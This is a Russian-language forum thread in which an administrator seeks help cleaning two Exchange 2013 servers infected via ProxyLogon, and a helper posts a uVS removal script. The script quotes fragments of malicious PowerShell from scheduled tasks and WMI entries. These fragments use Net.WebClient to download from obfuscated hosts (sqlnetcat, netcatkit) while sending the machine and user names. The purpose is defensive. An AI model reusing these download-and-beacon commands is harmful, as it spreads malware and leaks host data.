MS Exchange 2013 поймали заразу на двух серверах. Прошу проверить. , ProxyLogon

RSS
Здравствуйте. MS Exchange 2013 поймали заразу на двух серверах. Прошу проверить. Удалять сам не стал из "шидулера", реестра. Обновления на двух серверах уже установили, закрывающую уязвимость. Если будут еще какие то комментарии напишите пожалуйста.
Положу сюда сразу два образа двух серверов. Если необходимо могу тему скопировать, по одному образу выложу.
Изменено: Владимир Шариков - 18.03.2021 17:16:52

Ответы

Цитата
santy написал:
Цитата
 Владимир  Шариков  написал:
Положу сюда сразу два образа двух серверов.
можно и второй образ положить
Цитата
Владимир Шариков написал:
Цитата
 santy  написал:
Цитата
 Владимир  Шариков  написал:
Положу сюда сразу два образа двух серверов.
можно и второй образ положить

по второму серверу:
это нормальный софт?
C:\PROGRAM FILES\WIN-ACME\WACS.EXE
--RENEW --BASEURI "HTTPS://ACME-V02.API.LETSENCRYPT.ORG/"
Цитата
santy написал:
Цитата
 Владимир  Шариков  написал:
Цитата
 santy  написал:
Цитата
 Владимир  Шариков  написал:
Положу сюда сразу два образа двух серверов.
можно и второй образ положить
по второму серверу:
это нормальный софт?
C:\PROGRAM FILES\WIN-ACME\WACS.EXE
--RENEW --BASEURI "HTTPS://ACME-V02.API.LETSENCRYPT.ORG/";
Да, это сертификаты обновляет.  
по второму серверу:

выполняем скрипт в uVS:
- скопировать содержимое кода в буфер обмена;
- стартуем uVS(start.exe), далее выбираем: текущий пользователь, меню - скрипты - выполнить скрипт из буфера обмена;
- закрываем все браузеры перед выполнением скрипта;
Код

;uVS v4.11.6 [http://dsrt.dyndns.org:8888]
;Target OS: NTv6.3
v400c
OFFSGNSAVE
;---------command-block---------
deltsk NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'DOWN.'+'SQLNETCAT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
deltsk NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'T.NET'+'CATKIT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
deltsk NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'T.SQL'+'NETCAT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
deltsk NET.WEBCLIENT).DOWNLOADSTRING('HTTP://'+'T.NET'+'CATKIT.COM/A.JSP?REP_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
deltsk T.NETCATKIT.COM
delwmi NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'DOWN.'+'SQLNETCAT.COM/AA.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
delwmi NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'T.NET'+'CATKIT.COM/AA.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
delwmi NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'T.SQL'+'NETCAT.COM/AA.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
delwmi NET.WEBCLIENT).DOWNLOADSTRING('HTTP://'+'T.NET'+'CATKIT.COM/AA.JSP?REP_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
apply

QUIT

без перезагрузка, пишем о старых и новых проблемах.
------------
если будет возможность перегрузить сервера,
выполните в uVS вначале твик 39, потом перегрузить систему, потом еще раз снять в uVS образы автозапуска, для проверки,
возможно получиться увидеть, кто  эти задачи создает.
(при условии, конечно, если они будут воссозданы)

Цитата
santy написал:
если будет возможность перегрузить сервера,
выполните в uVS вначале твик 39, потом перегрузить систему, потом еще раз снять в uVS образы автозапуска, для проверки,
возможно получиться увидеть, кто  эти задачи создает.
(при условии, конечно, если они будут воссозданы)

 
твик 39 что то найти не могу, найду.
Еще вопрос. По той же проблеме. После этой бяки вот такое вылетает у пользователей (см. скриншот)
Снимок.JPG (89.74 КБ)
Изменено: Владимир Шариков - 17.03.2021 18:17:11
Цитата
Владимир Шариков написал:
твик 39 что то найти не могу, найду.Еще вопрос. По той же проблеме. После этой бяки вот такое вылетает у пользователей (см. скриншот)

uVS - дополнительно-твики. твик 39 в низу окна.

скриншот не увидел или не прикрепился
Цитата
santy написал:
скриншот не увидел или не прикрепился
да, теперь вижу. файл лучше отправить на virustotal.com для проверки другими антивирусами. возможно, и бэкдор
Цитата
Владимир Шариков написал:
Что этот код делает? Стоит ли боятся "Последствий" этой бяки?

я думаю стоит. эксплойт для ProxyLogon, по словам исследователей, мог использоваться в теч двух месяцев, до выхода мартовского обновления от Microsoft. (Возможно, была утечка эксплойта через поставщиков ПО, которые имеют ранний доступ к полученным сообщениям от исследователей)

Цитата
После выхода официальных исправлений даже для неподдерживаемых версий уязвимые серверы Microsoft Exchange, напрямую открытые в Интернете, стали еще более горячей целью, поскольку злоумышленники могли перепроектировать обновления для создания эксплойта.

ESET видела, что более 10 групп APT бросились атаковать непропатченные устройства. Многие из них занимались кибершпионажем, и в этот список входят Mikroceen и Tonto Team, но не все.

Исследователи заметили активность группы, которую они называют «Opera» Cobalt Strike, которая использовала уязвимости Microsoft Exchange для установки продукта для тестирования на проникновение Cobalt Strike, который является обычным для некоторых известных кибергрупп Ransomware.

В другом случае ESET заметил, что злоумышленник сбрасывает веб-оболочки, чтобы «установить так называемые бэкдоры IIS». Активность, приписываемая ботнету DLTMiner [1, 2], занимающемуся майнингом криптовалют, была замечена на серверах, которые были атакованы с помощью уязвимостей ProxyLogon.

более подробно, здесь
https://www.bleepingcomputer.com/news/security/the-microsoft-exchange-hacks-how-they-started-and-where-we-are/
Цитата
Владимир Шариков написал:
Еще вопрос. По той же проблеме. После этой бяки вот такое вылетает у пользователей (см. скриншот)

это на клиентских системах происходит?
Читают тему (гостей: 1)